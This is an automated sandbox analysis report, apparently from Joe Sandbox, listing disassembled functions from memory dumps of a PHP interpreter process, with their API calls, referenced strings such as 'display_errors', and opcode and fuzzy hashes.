                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: FileHeader$ExceptionRaise
                                                • String ID: Access violation - no RTTI data!$Bad dynamic_cast!
                                                • API String ID: 3685223789-3176238549
                                                • Opcode ID: 1336bfc7bd71620dddb987db4d102eb14b6a352524fa12ffdcc3c0e48972cdbe
                                                • Instruction ID: 36c28e8f9d857a6067b87c2fda87108101fc1f0f807b8b6acd92d1f2eb99aa5c
                                                • Opcode Fuzzy Hash: 1336bfc7bd71620dddb987db4d102eb14b6a352524fa12ffdcc3c0e48972cdbe
                                                • Instruction Fuzzy Hash: E9018C65B2EE86D1EE008B92E4901B82322FF92FA4F4050F3E50E07A75EF6CE404C710
                                                Function 00007FFE1A526690 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: ExceptionFileHeaderRaise
                                                • String ID: csm
                                                • API String ID: 2573137834-1018135373
                                                • Opcode ID: 51a2530866bc70b3fa6e7487cc130fe87b9602d28e5a22477376607ad08b6180
                                                • Instruction ID: f88b696069d30b6bbbf229753ac897d9147f220a9ad34bab49dfdf297320c23e
                                                • Opcode Fuzzy Hash: 51a2530866bc70b3fa6e7487cc130fe87b9602d28e5a22477376607ad08b6180
                                                • Instruction Fuzzy Hash: 7F113D3260CF8182EB108F26E44026977A5FB89F94F1842B2DE8D07B78DF3DD5558740
                                                Function 00007FF7498C8590 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: _efree@@8php_request_shutdownzend_hash_index_del@@16zend_vspprintf
                                                • String ID: %s Closing
                                                • API String ID: 3584861783-2100637938
                                                • Opcode ID: 438469a9f5921bcf9cf2a4a36d90594e9b36b1f7039c76b63023dd852b9db80d
                                                • Instruction ID: 8a6570dbb5cbe498b929f930de82e83ee78adcfd68b375d48d5e32bf8a8aec6d
                                                • Opcode Fuzzy Hash: 438469a9f5921bcf9cf2a4a36d90594e9b36b1f7039c76b63023dd852b9db80d
                                                • Instruction Fuzzy Hash: A3F0FB66618F86C1DB04AF1AE490269A335F788BC4F949136CE0E1B725CE39D0A5C310
                                                Function 00007FF7498C2832 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: php_lint_script
                                                • String ID: Errors parsing %s$No syntax errors detected in %s
                                                • API String ID: 692691059-3881924717
                                                • Opcode ID: 7ef8607b5eaa21f7350985fc350835cc1cdc1009de95a6b8fac62e4bcfd6e08f
                                                • Instruction ID: c25ec95c552b2a0b2b19d2fee85005055f641e17b90407d23681236e7f9bc3da
                                                • Opcode Fuzzy Hash: 7ef8607b5eaa21f7350985fc350835cc1cdc1009de95a6b8fac62e4bcfd6e08f
                                                • Instruction Fuzzy Hash: 7001722960DB06C5EB10FF1AE894178A378FB48B84F804036DA4E43760DF6CE019E710
                                                Function 00007FFE1A52EDF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00007FFE1A52F040: _IsNonwritableInCurrentImage.LIBCMT ref: 00007FFE1A52F100
                                                  • Part of subcall function 00007FFE1A52F040: RtlUnwindEx.KERNEL32(?,?,?,?,?,?,?,00007FFE1A52EE05), ref: 00007FFE1A52F14F
                                                  • Part of subcall function 00007FFE1A5269C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A5225CE), ref: 00007FFE1A5269CE
                                                • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A52EE2A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritableUnwindabortterminate
                                                • String ID: csm$f
                                                • API String ID: 4189928240-629598281
                                                • Opcode ID: fb015faef4bf75acf24bdce02b26b27ea635390a237ea967a8c643fc2c3390a7
                                                • Instruction ID: 125677b5e8d48a5aa6203ca8557bf7b8eb441621ae719e5587136ffb325e6b31
                                                • Opcode Fuzzy Hash: fb015faef4bf75acf24bdce02b26b27ea635390a237ea967a8c643fc2c3390a7
                                                • Instruction Fuzzy Hash: E7E06C71E0CB41C1F7145BA2B14017D2B65EF46F74F1440F7DA8806656CF3DD8A44611
                                                Function 00007FF7498C1840 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __zend_malloczend_hash_str_update@@32
                                                • String ID: display_errors
                                                • API String ID: 122064108-193476854
                                                • Opcode ID: 8a9fa1dd27072ab7ed04f1d43385623eca899bc9bf9346a2a3558b2d3bcba165
                                                • Instruction ID: bfabcc0d8b104a3fa8ac8cf0c380b7962d714d1f5687cc6e8a6dbda0ac59af28
                                                • Opcode Fuzzy Hash: 8a9fa1dd27072ab7ed04f1d43385623eca899bc9bf9346a2a3558b2d3bcba165
                                                • Instruction Fuzzy Hash: E9F03972518740C6E714AF10E408359FBB0FB88B48F848024DA8D0B3A1CFBEC2E9CB50
                                                Function 00007FFE1A5269DC Relevance: 5.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetLastError.KERNEL32(?,?,?,00007FFE1A526859,?,?,?,?,00007FFE1A52FF42,?,?,?,?,?), ref: 00007FFE1A5269FB
                                                • SetLastError.KERNEL32(?,?,?,00007FFE1A526859,?,?,?,?,00007FFE1A52FF42,?,?,?,?,?), ref: 00007FFE1A526A84
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: ErrorLast
                                                • String ID:
                                                • API String ID: 1452528299-0
                                                • Opcode ID: bbe9895d534b658101cce7e74ca5bd95b80ee12bf15f37732e53d0ee5c009e2b
                                                • Instruction ID: 6a3978a519f4cc085dd91118dc0e1b36f211bb4e42773ac87f7c03dc1edbab36
                                                • Opcode Fuzzy Hash: bbe9895d534b658101cce7e74ca5bd95b80ee12bf15f37732e53d0ee5c009e2b
                                                • Instruction Fuzzy Hash: 6211F420F0DA46C2FA545767A9441352262EF8AFF0F1446F7D95E07BF5DF2CB8419620